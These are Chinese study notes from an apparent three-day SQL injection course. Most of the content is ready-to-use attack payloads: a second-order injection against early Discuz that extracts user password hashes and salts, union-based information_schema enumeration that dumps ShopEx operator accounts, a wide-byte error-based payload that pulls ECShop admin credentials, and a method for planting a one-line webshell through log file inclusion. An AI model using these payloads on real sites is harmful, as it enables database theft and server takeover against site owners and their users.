三天注入实战学习笔记

---------------------------------------------------------
第一天 cookies注入
1，web体系结构

表示层，逻辑层（动态），存储层（数据库）
表示层，逻辑层，应用层（waf），存储层

2，利用Cookies Manager火狐插件修改cookie进行注入

---------------------------------------------------------
第二天 文件包含漏洞、POST二次注入
文件包含漏洞：检查本站是否存在日志、错误记录页面，若存在，则故意在各个参数中插入一句话木马使其报错并记录进入日志，然后用菜刀连接该日志、错误记录页面。

---------------------------------------------------------
第三天 实战二次注入（MySQL）

实战为Discuz早期版本漏洞
POST二次注入：当第一次的留言等输入内容会被过滤、检测时，输入的内容不会被当成SQL注入来运行，就是输入的字符串，在查看url中的参数、确定是否有重新编辑的页面以及其参数，存在这样的漏洞的网站，会默认对二次编辑的内容不检测，默认数据库中的数据都是安全的，当编辑时没有做任何过滤直接保存到数据库，从而达到注入效果。因此可以利用这个逻辑漏洞对其进行注入，找到重新编辑，输入内容并抓包，构造一个sql注入语句，提交后可在内容显示区看到返回的结果。

1，可回复
',`subject`=(/*!select*/ concat(@@version,':',user(),':',database())),comment='
查询数据库信息

回复
',`subject`=(/*!select*/ concat(username,'|',password,'|',salt) from pre_ucenter_members where uid=1 limit 0,1),comment='
查询帐号密码，回复后点击编辑可以在地址栏看到自己的pid和tid，记录下来。

2,然后访问追加模式编辑的链接，并且将1中得到的pid和tid填入
/forum.php?mod=misc&tid={tid}&action=postappend&pid={pid}
点击提交就实现了二次注入
---------------------------------------------------------
第三天 实战cookies注入（MySQL）

实战为某商城CMS早期漏洞

1，MySQL数据库中所有的数据库名都存在 information_schema数据库中的schemata表中的schema_name中
" and 1=2 union select 1,2,schema_name,4,5,6 from information_schema.schemata limit 1,1#

2，一个数据库中的表名都存放在information_schema数据库中的tables表中的table_name中
" and 1=2 union select 1,2,table_name,4,5,6 from information_schema.tables where table_schema=0x73686F706578 limit 0,1#

3，一个数据库中的字段名都存放在information_schema数据库中的columns表中的columns_name中
" and 1=2 union select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_schema=0x73686F706578 and table_name=0x7364625F6F70657261746F7273 limit 1,1 #

4，查询记录可根据1，2，3得到的信息，直接查询相应的记录
" and 1=2 union select 1,2,username,4,5,6 from shopex.sdb_operator limit 0,1#

简洁版 " LIMIT 1,1 UNION ALL SELECT 11,22,(select count(*) from sdb_operators),44,55,66#
---------------------------------------------------------
宽字节 %ce %df

%ce' and 1=1 union select 1 and (select 1 from(select count(*),concat((Select concat(0x5b,user_name,0x3a,password,0x5d) FROM ecs_admin_user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) %23